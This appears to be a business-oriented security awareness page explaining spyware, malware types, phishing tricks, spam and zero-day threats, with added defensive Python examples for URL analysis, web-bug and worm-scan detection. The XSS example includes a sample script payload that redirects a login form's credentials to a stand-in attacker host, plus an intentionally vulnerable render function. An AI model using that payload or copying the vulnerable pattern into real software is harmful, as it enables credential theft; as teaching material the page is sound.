Malware Threats Against Your Business


A Brief Taxonomy of the Bad Stuff That's Out to Get You

 

Spyware - Viruses, Worms and Trojans - Phishing - Spam

Additional Info - Zero Day Threats, Blended Threats, etc.

"And that goes for your little dog, too!"


 

New Trends In Hacker Attacks

Hackers are getting more personal. The potential financial gain from "owning" PCs keeps growing, and attackers are concentrating on bots and backdoor Trojans, currently the two most active categories.

And how do they infect users? With increasingly sophisticated code. The cyber-mob uses personalization techniques to attack visitors to compromised websites more effectively, and in the last 12 months the number of sites using this approach has skyrocketed. The malicious page looks at the browser you are using and your IP address, then serves an exploit for a known vulnerability in exactly that environment. In other words: multiple exploits and payloads, selected per victim, sitting on a malicious website. Increasingly the payload is delivered in two steps. First the system is infected with a small so-called dropper; later that code activates and downloads the actual malicious payload.

Email and P2P (peer-to-peer) networks remain popular vectors for spreading malware. It is interesting to note that rootkit attacks against Windows PCs have gone down during the last six months. Companies are being attacked with the goal of data theft: hackers now write malicious code aimed at specific organizations, after data that can be turned into financial gain. They blend phishing, spam, botnets, Trojans and zero-day exploits, using global networks that execute coordinated attacks. The number of bot-infected PCs rose by 11% and there are now over 6 million PC zombies. According to Symantec, in the first six months of last year there were on average 6,110 DDoS attacks a day, close to 40% of which targeted ISPs, and CERT says the number is not dropping.

Obviously you can expect new exploits for Vista, not just the OS but also the third-party apps running on it, and since virtualization has taken flight, you can count on virtual machines and their hosts being targeted for penetration too. So, layer your defenses, stay alert, and keep 'Best Practices' IN PRACTICE!


Spyware

The most recent widely accepted definition of spyware is:

    Technologies deployed without appropriate user consent and/or implemented in ways that impair user control over:

  • Material changes that affect their user experience, privacy, or system security;
  • Use of their system resources, including what programs are installed on their computers; and/or
  • Collection, use, and distribution of their personal or other sensitive information.


Now, most inexpensive firewalls and antivirus packages won't do much to stop this type of intrusion. In most cases it is more of a nuisance than a direct threat, but spyware has a dark side that needs to be examined. Most of the time this stuff tracks your web browsing habits and sends that information back to certain web-based advertisers. That's why you get those never-to-be-sufficiently-damned pop-ups and other intrusive adverts: someone knows where you've been and gears their advertising accordingly. Getting spam? This may be one of the reasons.

 

Often you don't even realize that you've installed these apps, because they either piggyback on free software that serves another purpose (say, the ad-serving app Cydoor, which is included with the Kazaa file-sharing program) or are installed by nefarious Web sites as you browse (notice a new default home page or search engine in your Internet Explorer?). The end result is that your browser may default to unusual search-engine sites or produce odd search results, and you may see a sharp increase in the number of pop-up ads that litter your desktop while you surf.

 

In practical terms, you now have one or more "live" servers sitting on your PC shoveling information about you and your surfing habits out the back door. These tiny 'servers' can be hijacked by knowledgeable bad guys and used for any other purpose they see fit. This, folks, is not a Good Thing. Check out the Effective Measures section of this website and the online Spyware Guide for more useful information concerning this threat.


Viruses, Worms and Trojans

Today there are over 50,000 known viruses, with another 200 to 800 discovered each month. Virus infections have increased steadily from 1 per 100 computers in 1996 to 9 per 100 systems in 2003, according to the International Computer Security Association (ICSA) Labs' 6th Annual Computer Virus Prevalence Survey. ICSA also reports that over 99% of all companies have been infected with at least one virus in the last 12 months, and that over half have experienced a virus disaster.


Phishing (don't get hooked!)

Phishing is a criminal activity using social engineering techniques. Phishers attempt to fraudulently acquire sensitive information, such as passwords and credit card details, by masquerading as a trustworthy person or business in an electronic communication. Phishing is typically carried out using email or an instant message, although phone contact has been used as well. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, and technical measures.

Phishing techniques

Most methods of phishing use some form of technical deception designed to make a link in an email (and the spoofed website it leads to) appear to belong to the spoofed organization. Misspelled URLs or the use of subdomains are common tricks, as in the example URL http://www.yourbank.com.example.com/, where the site actually visited is example.com and "www.yourbank.com" is merely a subdomain of it. Another common trick is to make the anchor text of a link look like a valid URL while the link itself goes to the phisher's site.

An older method of spoofing links used links containing the @ symbol, the URL syntax for embedding a username and password (which HTTP URLs are not supposed to carry, but browsers accepted). For example, the link http://www.google.com@members.tripod.com/ might deceive a casual observer into believing that it will open a page on www.google.com, whereas it actually directs the browser to a page on members.tripod.com, using a username of www.google.com; the page opens normally regardless of the username supplied. Internet Explorer was changed to refuse such URLs, while the Mozilla and Opera web browsers opted to present a warning message and give users the option of continuing to the site or canceling.

A further problem with URLs has been found in the handling of Internationalized Domain Names (IDN) in web browsers: visually identical web addresses can lead to different, possibly malicious, websites. Despite the publicity surrounding the flaw, known as IDN spoofing or a homograph attack, no phishing attacks were known to have taken advantage of it at the time of writing. Phishers have taken advantage of a similar risk, using open URL redirectors on the websites of trusted organizations to disguise malicious URLs with a trusted domain.
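To make the link tricks above concrete, here is an added example (not code from the original page, and not any vendor's product) that examines a link the way a careful mail gateway or a suspicious user would: it works out the host the browser will really connect to, then flags a trusted name buried in someone else's subdomain, the '@' trick, punycode and non-ASCII homograph hosts, and an open-redirector parameter on a trusted site. The trusted-domain list, the redirector parameter names and every sample URL are assumptions made for the illustration.

```python
"""Classify phishing link tricks: trusted name as a subdomain, credentials
before '@', IDN homographs / punycode, open redirectors, and anchor text
that does not match the href.

Added example, not code from the original page. TRUSTED_DOMAINS,
REDIRECT_PARAMS and all sample URLs are constructed for illustration."""
import unicodedata
from urllib.parse import urlsplit, parse_qs

# Assumed: the organisations being impersonated and their real domains.
TRUSTED_DOMAINS = {"yourbank.com", "google.com", "paypal.com"}
# Assumed: query parameters that commonly act as open redirectors.
REDIRECT_PARAMS = {"url", "redirect", "redir", "next", "goto", "return",
                   "returnurl", "target"}


def registrable_domain(host: str) -> str:
    """Last two labels of the host. Good enough for .com-style names; a real
    deployment would consult the Public Suffix List."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def analyze_url(url: str) -> list[str]:
    """Return human-readable findings (empty list if nothing suspicious)."""
    findings = []
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()      # urlsplit strips userinfo
    real = registrable_domain(host)

    # http://www.google.com@members.tripod.com/ : text before '@' is a
    # username; the browser really connects to members.tripod.com.
    if parts.username is not None:
        findings.append(f"userinfo trick: destination is {host!r}, "
                        f"not {parts.username!r}")

    # http://www.yourbank.com.example.com/ : trusted name as a subdomain.
    if real not in TRUSTED_DOMAINS:
        for brand in TRUSTED_DOMAINS:
            if brand in host or brand.split(".")[0] in host.split("."):
                findings.append(f"subdomain trick: {brand!r} inside "
                                f"untrusted host {host!r}")
                break

    # IDN homographs: punycode labels or non-ASCII characters in the host.
    for label in host.split("."):
        if label.startswith("xn--"):
            try:
                decoded = label.encode("ascii").decode("idna")
            except UnicodeError:
                decoded = "?"
            findings.append(f"punycode label {label!r} displays as {decoded!r}")
    for ch in host:
        if ord(ch) > 127:
            findings.append(f"non-ASCII {ch!r} "
                            f"({unicodedata.name(ch, 'UNKNOWN')}) in host")

    # Open redirector on a trusted site: a parameter holding a URL that
    # points at a different registrable domain.
    if real in TRUSTED_DOMAINS:
        for key, values in parse_qs(parts.query).items():
            if key.lower() in REDIRECT_PARAMS:
                for value in values:
                    target = (urlsplit(value).hostname or "").lower()
                    if target and registrable_domain(target) != real:
                        findings.append(f"open redirector: {key}= sends "
                                        f"the user to {target!r}")
    return findings


def anchor_mismatch(href: str, text: str) -> bool:
    """True when link text that looks like a URL names a different site
    than the href actually points at."""
    text = text.strip()
    if " " in text or "." not in text:
        return False                         # 'Click here' is not a URL
    shown = urlsplit(text if "://" in text else "http://" + text).hostname
    if not shown:
        return False
    return registrable_domain(shown) != registrable_domain(
        urlsplit(href).hostname or "")


if __name__ == "__main__":
    samples = [
        "http://www.yourbank.com.example.com/",
        "http://www.google.com@members.tripod.com/",
        "http://www.yourbank.com/login?returnUrl=http%3A%2F%2Fevil.example%2Fphish",
        "http://www.yourbank.com/",
    ]
    for sample in samples:
        print(sample, "->", analyze_url(sample) or "clean")
    print(anchor_mismatch("http://evil.example/", "http://www.yourbank.com/"))
```

The two-label "registrable domain" shortcut will misjudge names like example.co.uk, and the brand check is deliberately loose; in production, use the Public Suffix List and your own list of impersonated names.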

Once the victim is on the website, the deception is not over. Some phishing pages use JavaScript to alter the address bar, either by placing a picture of the legitimate entity's URL over the real address bar or by closing the original address bar and opening a new one containing the legitimate URL.

In another popular method of phishing, an attacker uses a trusted website's own scripts against the victim. These attacks (known as cross-site scripting) are particularly problematic because they send the user to sign in at the bank's or service's real web page, where everything from the web address to the security certificate is genuine. In reality the link to that page is crafted to carry out the attack, and it is very difficult to spot without specialist knowledge. Just such a flaw was used in 2006 against PayPal.
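The reason a trusted site's own page can become the phishing page is a script that copies something from the link straight into the HTML it sends back. The added example below (not code from the original page, and not the PayPal flaw mentioned above) shows a login page that reflects a "notice" message and a "return" target from the query string: the vulnerable version lets a crafted link inject a script that silently re-points the real login form at the attacker's server, while the hardened version escapes the message and only accepts a same-site return path. The parameter names and the page template are assumptions.

```python
"""Reflected XSS on a login page, vulnerable and hardened side by side.

Added example, not code from the original page. The template, parameter
names, PAYLOAD and evil.example host are all constructed."""
import html
from urllib.parse import urlsplit

# Assumed page template; {notice} and {action} come from the request.
TEMPLATE = (
    "<html><body>"
    "<p class='notice'>{notice}</p>"
    "<form method='post' action='{action}'>"
    "<input name='user'><input name='pass' type='password'>"
    "<input type='submit' value='Log in'></form></body></html>"
)

# What a phisher would put in the 'notice' parameter of the crafted link:
# the page is the bank's, the certificate is the bank's, but the form now
# posts the credentials to the attacker.
PAYLOAD = "<script>document.forms[0].action='http://evil.example/steal'</script>"


def render_vulnerable(params: dict) -> str:
    """Raw interpolation: attacker-controlled text becomes markup."""
    return TEMPLATE.format(notice=params.get("notice", ""),
                           action=params.get("return", "/login"))


def safe_return_path(value: str) -> str:
    """Accept only a path on this site; anything with a scheme or host
    (including protocol-relative '//evil.example') falls back to /login."""
    parts = urlsplit(value)
    if parts.scheme or parts.netloc or not value.startswith("/") \
            or value.startswith("//"):
        return "/login"
    return value


def render_safe(params: dict) -> str:
    """Escape everything reflected and validate the return target."""
    notice = html.escape(params.get("notice", ""), quote=True)
    action = html.escape(safe_return_path(params.get("return", "/login")),
                         quote=True)
    return TEMPLATE.format(notice=notice, action=action)


if __name__ == "__main__":
    crafted = {"notice": PAYLOAD, "return": "http://evil.example/steal"}
    print("vulnerable:", render_vulnerable(crafted))
    print("hardened:  ", render_safe(crafted))
```

The fix is two separate controls: output encoding for anything echoed into HTML, and a whitelist (here "must be a local path") for anything that becomes a URL, since escaping alone would still let a full http:// URL through as the form action.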

Not all phishing attacks require a fake website. In an incident in 2006, messages that claimed to be from a bank told users to dial a phone number regarding a problem with their bank account. Once the phone number (owned by the phisher, and provided by a Voice over IP provider) was dialed, prompts told users to enter their account numbers and PIN.

[Figure: Phishing Attack Anatomy]


Spam

In February of 2007, Australia-based Marshal's Threat Research and Content Engineering Team reported spam volume is at its highest peak ever. Spam has increased 280% since just last October. The report went on to note that if the surge continues apace, 90% of all e-mail will be junk.

That's a whole lot of unwanted e-mail. And spam isn't just a nuisance; it wastes time and cuts productivity for business. It is cheap for the spammers to send, and they may reap significant financial benefits from selling their "wares." A good number of those unsolicited messages are outright scams, which again cost the unsuspecting time and money.

In addition to installing and using spam filters, you can protect yourself from this sea of garbage. Here are some tips to help keep the growing wave of unwanted messages from flooding your inbox.

  • Obscure your e-mail address. Spammers use special programs that extract e-mail addresses from Web sites and Usenet postings. To avoid ending up on a spammer's mailing list when you post to a Web forum or a newsgroup, you can obscure your e-mail address by inserting something obvious into it. So if your e-mail address is xyz@yahoo.com, change it to xyz@yah[delete_this]oo.com. Or, try something like this: "xyz at yahoo dot com."

  • Don't reply to spam messages, not even to reply to be "removed." Often the instructions are fake, or they're a way to collect more addresses. Replying confirms to the spammers that your e-mail address is active, and you may receive even more junk mail.

  • Remove your e-mail address from your Web site's pages and offer a Web-based mail form instead. That prevents spammers' robots from harvesting your address and putting it on their mailing lists. (Make sure the form script validates its input and only sends to your own address, so it cannot itself be abused as a spam relay.) Contact-Us-Online.com can provide you with such a script free of charge.

  • Don't open spam. Much spam is HTML that references an image or other file on a Web server operated by the spammers (a "web bug"). When your mail program fetches it, you have confirmed that you opened the message and therefore that the spammers have a good e-mail address, which -- you guessed it -- results in them sending you even more spam. Delete spam without opening it, and don't use your e-mail program's preview pane: previewing spam is the same as viewing it. If your mail program can be set not to load remote images, turn that setting on as well.
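What the "web bug" looks like in practice, as an added example (not code from the original page): a small parser that lists every remote resource an HTML message would fetch on display, distinguishing the classic one-pixel tracking image with a per-recipient token from inline (cid:) and embedded (data:) images that never phone home. The sample message is constructed; this is the check a mail gateway or a cautious reader can run without rendering the message.

```python
"""List the remote resources ('web bugs') an HTML mail would fetch.

Added example, not code from the original page. SAMPLE_SPAM and the
track.example / offers.example hosts are constructed."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed message: one tracking pixel with a recipient token, one
# inline logo, one embedded image, one remote stylesheet with a token.
SAMPLE_SPAM = """<html><body>
<p>Congratulations! Click <a href="http://offers.example/go?id=7f3a">here</a>.</p>
<img src="http://track.example/b.gif?uid=7f3a21&e=victim%40example.net" width="1" height="1">
<img src="cid:logo123" alt="logo">
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=">
<link rel="stylesheet" href="http://track.example/s.css?uid=7f3a21">
</body></html>"""

REMOTE_SCHEMES = ("http", "https")


class BeaconFinder(HTMLParser):
    """Collect elements the mail client loads automatically (not <a>,
    which needs a click)."""

    def __init__(self):
        super().__init__()
        self.beacons = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        src = None
        if tag in ("img", "iframe", "script"):
            src = a.get("src")
        elif tag == "link":
            src = a.get("href")
        elif tag == "body":
            src = a.get("background")
        if not src or urlsplit(src).scheme not in REMOTE_SCHEMES:
            return                     # cid: and data: never leave the machine
        self.beacons.append({
            "tag": tag,
            "url": src,
            "host": urlsplit(src).hostname,
            # 1x1 or 0x0 image: nothing for the reader, everything for the sender
            "invisible": a.get("width") in ("0", "1") and a.get("height") in ("0", "1"),
            # a query string usually carries the per-recipient identifier
            "has_token": "?" in src,
        })


def find_beacons(html_body: str) -> list[dict]:
    """Parse without rendering and return every remote fetch found."""
    finder = BeaconFinder()
    finder.feed(html_body)
    return finder.beacons


if __name__ == "__main__":
    for b in find_beacons(SAMPLE_SPAM):
        flag = "TRACKING PIXEL" if b["invisible"] and b["has_token"] else "remote fetch"
        print(f"{flag}: <{b['tag']}> -> {b['host']} ({b['url']})")
```

A mail client that loads remote content fires the first two fetches just by showing the message in a preview pane; the cid: and data: images are harmless because they are already inside the message.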


Additional Information

Zero Day Threats

A zero-day (or zero-hour) attack exploits a vulnerability in a computer application that is undisclosed or unpatched. Zero-day attacks are extremely dangerous because they take advantage of security holes for which no fix is yet available.

Attack vectors

Malware writers can exploit zero-day vulnerabilities through several different attack vectors. When users visit rogue Web sites, malicious code on the site can exploit vulnerabilities in the Web browser; browsers are a particular target for criminals because of their widespread distribution and use. Cybercriminals can also send malicious e-mail attachments, which exploit vulnerabilities in the application that opens the attachment. Exploits for common file types are numerous and frequent, as their growing presence in vulnerability databases such as those maintained by US-CERT shows, and criminals engineer malware around them to compromise the attacked systems or steal confidential data.

Vulnerability windows

Zero-day attacks can occur because a vulnerability window exists between the time a threat is released and the time a patch or signature is not only released by the vendor but actually installed on your systems.

For zero-day exploits and the viruses, Trojans and other malware that carry them, the vulnerability window follows this timeline:

  • Release of new threat/exploit into the wild
  • Detection and study of new exploit
  • Development of new solution
  • Release of patch or updated signature pattern to catch the exploit
  • Distribution and installation of patch on user's systems or updating of virus databases

This process can take anywhere from hours to weeks, and the network is exposed for the whole of that vulnerability window. One report estimated the average 2006 vulnerability window at 28 days.


Viruses vs. Worms (and Trojans)

We don't often think about what differentiates a virus from a worm. We just know that they create huge difficulties. For most folks the differences don't matter, but for those of us who must defend against them, knowledge is a great weapon. A Trojan program is much like the Trojan horse from which it gets its name: a program that claims to do one thing but actually does something else, or a program you don't even know is on your computer. Trojans and the related class of programs called 'spyware' can do many things, including reporting your passwords and other information back to the program's author, or letting someone else take control of your computer. Antivirus programs detect some Trojans, but not all. The good news is that remedies are available to help you detect and remove these threats to the privacy and security of your home network. In today's environment it takes, at a minimum, the combination of a local software firewall and a good antivirus program to provide a decent level of security.

What's the difference? Two of the things that distinguish viruses from worms are the attack vector and the mode of propagation. These system-wreckers/hijackers operate as follows:

Virus Attack Vector: A virus requires interaction, such as your reading an email and clicking an attachment (as in the "I Love You" virus), opening a .zip file, clicking a hyperlink, or opening an attachment. The machine won't get sick unless you perform some task, which makes this a poor entry method from a hacker's point of view: a hacker typically wants to break into machines without needing a user at the console to take the intended action.

Virus Propagation: For a virus to propagate, the infected machine sends an email to others who perform tasks, which results in making their machines sick with a virus.

Worm Attack Vector: A worm takes advantage of a vulnerability on an unpatched computer system (e.g. the Blaster worm, which attacks machines missing the MS03-026 patch). A worm doesn't require you to take any action in order to compromise the computer. A machine plugged into the network can be attacked by the simple act of turning it on, a hacker's dream: access to servers and workstations at any time without a user doing a thing. Trojans, by contrast, usually arrive by the virus route (a user runs an attachment or download) or are dropped by a worm once it is in; what makes them Trojans is what they do once running, typically opening a backdoor.

Worm Propagation: After a worm has compromised a system, it propagates to other systems without user interaction. The nasty result is a worm traversing the Internet in a matter of hours, infecting enormous numbers of machines.

Viruses:

  • Require user interaction.
  • Propagate more slowly than worms because of the need for human interaction.
  • Primarily attack workstations, as a user must be on the targeted machine to initiate the infection.
  • Are not the primary mechanism of attack for hackers.
  • Can usually be intercepted and destroyed by antivirus software once a signature exists.
  • Usually do not need a software vulnerability; they mostly rely on end users making poor decisions (like opening an email attachment from an unknown person).
  • Are single-ended in nature: they tend to infect using one mechanism and then infect subsequent machines using the same mechanism.

Worms:

  • Do not require any user interaction.
  • Propagate quickly, because there is no need for human interaction.
  • Can attack any unpatched machine on the network, servers and workstations alike.
  • Are a hacker's best friend.
  • Are not reliably stopped by antivirus software alone: the exploit runs before any file is written to disk, so patching and a host firewall are the primary defenses.
  • Require the presence of a security vulnerability on the machine to compromise it.
  • May harvest confidential data from the machine (like usernames and passwords) once it is compromised, which can then be used to compromise other machines, even patched ones (e.g. Code Red, Nimda).
  • Can be multi-partite: they attack a machine via one vector and then attack subsequent machines using any of many others (a worm that got in through the Blaster hole can go on to attack other machines via open file shares or the holes used by Nimda, Code Red, Slammer, etc.). See Blended Threats below.

Trojans straddle the two lists: most arrive the way a virus does, as something the user runs, or are installed by a worm, but once running they behave like the worm's payload, leaving an outsider a way back in.
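The "no user required" propagation described above leaves a very visible trace on the network: one host opening connections to many different machines on the same exploitable port within seconds. Blaster scanned TCP 135 (the MS03-026 hole), Slammer UDP 1434, file-share worms TCP 445 and Code Red/Nimda TCP 80. The added example below (not code from the original page or any product) runs that detection over firewall log lines; the log format and every line in it are constructed for the illustration, and the window and threshold are assumptions to tune for your own network.

```python
"""Worm-scan detection over firewall logs: a source that touches many
distinct destinations on a worm port inside a short window.

Added example, not code from the original page. The log format, hosts
and lines in SAMPLE_LOG are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed log format: "<date> <time> <ALLOW|DENY> <proto> src:port -> dst:port"
LINE = re.compile(
    r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) (ALLOW|DENY) (TCP|UDP) "
    r"([\d.]+):(\d+) -> ([\d.]+):(\d+)$")

WORM_PORTS = {
    ("TCP", 135): "RPC/DCOM (Blaster, MS03-026)",
    ("UDP", 1434): "SQL Server resolution (Slammer)",
    ("TCP", 445): "SMB file shares",
    ("TCP", 80): "IIS (Code Red, Nimda)",
}

SAMPLE_LOG = [
    # Infected 10.0.0.5: eight different targets on TCP 135 in six seconds.
    "2003-08-12 10:00:00 ALLOW TCP 10.0.0.5:1034 -> 10.0.3.17:135",
    "2003-08-12 10:00:00 DENY TCP 10.0.0.5:1035 -> 10.0.3.18:135",
    "2003-08-12 10:00:01 DENY TCP 10.0.0.5:1036 -> 10.0.3.19:135",
    "2003-08-12 10:00:01 DENY TCP 10.0.0.5:1037 -> 10.0.3.20:135",
    "2003-08-12 10:00:02 ALLOW TCP 10.0.0.5:1038 -> 10.0.3.21:135",
    "2003-08-12 10:00:03 DENY TCP 10.0.0.5:1039 -> 10.0.3.22:135",
    "2003-08-12 10:00:04 DENY TCP 10.0.0.5:1040 -> 10.0.3.23:135",
    "2003-08-12 10:00:05 DENY TCP 10.0.0.5:1041 -> 10.0.3.24:135",
    # Normal workstation 10.0.0.9: many connections, all to its one file server.
    "2003-08-12 10:00:01 ALLOW TCP 10.0.0.9:2231 -> 10.0.1.2:445",
    "2003-08-12 10:00:01 ALLOW TCP 10.0.0.9:2232 -> 10.0.1.2:445",
    "2003-08-12 10:00:02 ALLOW TCP 10.0.0.9:2233 -> 10.0.1.2:445",
    "2003-08-12 10:00:03 ALLOW TCP 10.0.0.9:2234 -> 10.0.1.2:445",
    "2003-08-12 10:00:04 ALLOW TCP 10.0.0.9:2235 -> 10.0.1.2:445",
    "2003-08-12 10:00:05 ALLOW TCP 10.0.0.9:2236 -> 10.0.1.2:445",
    # Someone browsing from 10.0.0.7: a few web servers, minutes apart.
    "2003-08-12 10:00:03 ALLOW TCP 10.0.0.7:3001 -> 10.0.2.10:80",
    "2003-08-12 10:03:00 ALLOW TCP 10.0.0.7:3002 -> 10.0.2.11:80",
    "2003-08-12 10:06:00 ALLOW TCP 10.0.0.7:3003 -> 10.0.2.12:80",
    # One stray SQL probe, and a corrupt line the parser must skip.
    "2003-08-12 10:00:02 DENY UDP 10.0.0.5:1042 -> 10.0.3.30:1434",
    "garbage line here",
]


def parse(line):
    """Return a dict for a well-formed line, None for anything else."""
    m = LINE.match(line.strip())
    if not m:
        return None
    ts, action, proto, src, _sport, dst, dport = m.groups()
    return {"ts": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), "action": action,
            "proto": proto, "src": src, "dst": dst, "dport": int(dport)}


def detect_scanners(lines, window=timedelta(seconds=10), threshold=5):
    """Map (src, proto, dport) -> most distinct targets hit inside any
    `window`, for sources reaching `threshold` or more on a worm port.
    Denied connections count too: a worm keeps scanning whether or not
    the firewall lets it through."""
    events = [e for e in map(parse, lines)
              if e and (e["proto"], e["dport"]) in WORM_PORTS]
    events.sort(key=lambda e: e["ts"])
    per_key = defaultdict(list)
    for e in events:
        per_key[(e["src"], e["proto"], e["dport"])].append(e)
    alerts = {}
    for key, evs in per_key.items():
        start = 0
        for end, e in enumerate(evs):          # sliding time window
            while e["ts"] - evs[start]["ts"] > window:
                start += 1
            distinct = len({x["dst"] for x in evs[start:end + 1]})
            if distinct >= threshold:
                alerts[key] = max(distinct, alerts.get(key, 0))
    return alerts


def describe(alerts):
    return [f"{src} hit {n} hosts on {proto}/{port} "
            f"[{WORM_PORTS[(proto, port)]}] - worm-like scanning"
            for (src, proto, port), n in sorted(alerts.items())]


if __name__ == "__main__":
    for msg in describe(detect_scanners(SAMPLE_LOG)):
        print(msg)
```

Only 10.0.0.5 trips the alarm: the file-server user makes just as many connections but to a single host, and the browsing host touches several web servers but minutes apart. Counting denied attempts is what lets a perimeter firewall see an infected machine on the inside before it finds an unpatched one.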

Blended Threats. Blended threats are a class of attack that use multiple methods and techniques to transmit and spread an attack across your computer systems and networks and on to others'. It takes a layered defense to defeat such attacks.

Intrusion. Not all attacks are destructive. We hear about viruses and email worms, but it's the events that don't come to public attention that should concern us most. The threats mentioned earlier are inconvenient at best and destructive at worst: a virus might trash your hard drive, an email-propagated worm might clog your email server. But an intruder may have other objectives: patient records, bank account numbers, passwords, social security numbers, credit card numbers, in short any private information you might have lying around on your system. And believe me, if you've ever banked or made a purchase on-line (who hasn't, these days?), traces of those transactions still exist on your system, and they are easy pickings for the adept intruder. Their objective is identity theft. The information a hacker gleans from your system is usually bundled with that of other victims and sold to criminal enterprises from Eastern Europe to South East Asia. The latest spin on identity theft is that those who purchase illegally obtained information cobble together data from several people's files to create whole new identities, for purposes that can only bode ill for the victims.

Is Any of This Hard to Do? How easy is it to find systems to plunder? Unfortunately, not hard at all. The array of tools available for discovering and exploiting a vulnerable network, your vulnerable network, is nothing short of amazing. There are literally hundreds of public websites offering a wide selection of tools and techniques for locating, cracking and exploiting every sort of system, and the number of private sites and boards is larger still.

The bottom line: ignoring these threats is not an option. Protect yourself and your information assets.

Copyright 2003 - StarLAN Consulting Services